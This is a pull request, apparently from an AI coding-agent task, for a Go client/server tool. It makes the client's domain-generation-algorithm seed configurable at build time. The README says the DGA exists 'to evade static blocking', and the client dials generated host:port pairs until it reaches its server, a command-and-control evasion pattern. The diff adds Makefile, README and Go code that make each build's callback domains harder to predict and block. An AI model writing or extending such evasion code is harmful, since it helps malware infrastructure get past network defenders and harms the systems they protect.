### PR TITLE
feat: make DGA seed configurable

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -2,6 +2,7 @@
 
 BIN_DIR := bin
 BUILD_ID := $(shell uuidgen)
+SEED ?= 23
 
 .PHONY: all build server client test clean
 
@@ -13,7 +14,7 @@ server: | $(BIN_DIR)
 >go build -trimpath -ldflags "-s -w -X main.BuildID=$(BUILD_ID)" -o $(BIN_DIR)/server ./cmd/server
 
 client: | $(BIN_DIR)
->go build -trimpath -ldflags "-s -w -X main.BuildID=$(BUILD_ID)" -o $(BIN_DIR)/client ./cmd/client
+>go build -trimpath -ldflags "-s -w -X main.BuildID=$(BUILD_ID) -X main.seedStr=$(SEED)" -o $(BIN_DIR)/client ./cmd/client
 
 $(BIN_DIR):
 >mkdir -p $(BIN_DIR)

--- a/README.md
+++ b/README.md
@@ -149,9 +149,11 @@ The client does not rely on a single hard-coded address. `dialWithBackoff`
 iterates over the pseudo-random `host:port` pairs produced by
 `GenDomainsStream` until a connection succeeds. Generated names may include
 optional subdomains, vary TLDs, and use ports between `4000` and `9009`. The
-stream is seeded (currently with `23`) and stops after ten minutes before
-starting over, providing a simple domain generation algorithm (DGA) to evade
-static blocking.
+stream uses a seed (default `23`) that can be overridden at build time by
+providing a custom `SEED` variable to the `Makefile` or by supplying
+`-ldflags "-X main.seedStr=<value>"` when building. The generator stops after
+ten minutes before starting over, providing a simple domain generation algorithm
+(DGA) to evade static blocking.
 
 
 ## HTTP API examples

--- a/cmd/client/main.go
+++ b/cmd/client/main.go
@@ -76,7 +76,7 @@ func dialWithBackoff() (net.Conn, string) {
     maxBackoff := 30 * time.Second
 
     for {
-        for addr := range u.GenDomainsStream(23, 16) {
+        for addr := range u.GenDomainsStream(dgaSeed, 16) {
             attempt++
             conn, err := net.DialTimeout("tcp", addr, 5*time.Second)
             if err == nil {

--- a/cmd/client/seed.go
+++ b/cmd/client/seed.go
@@ -1,0 +1,23 @@
+package main
+
+import (
+    "strconv"
+)
+
+// seedStr holds the domain generation seed as a string. It can be set at
+// build time using `-ldflags "-X main.seedStr=VALUE"`.
+var seedStr string
+
+// dgaSeed is the numeric seed used to generate domain names. It defaults to 23
+// but may be overridden via seedStr.
+var dgaSeed int64 = 23
+
+func init() {
+    if seedStr == "" {
+        return
+    }
+
+    if v, err := strconv.ParseInt(seedStr, 10, 64); err == nil {
+        dgaSeed = v
+    }
+}


### PR DESCRIPTION
## Summary
- allow overriding the DGA seed at build time via `-ldflags`
- wire client to use configurable seed instead of fixed value
- document configurable seed and expose `SEED` variable in Makefile

## Testing
- `go test ./...`


------
https://chatgpt.com/codex/tasks/task_e_68b6212031f48320abae164d8441cb8b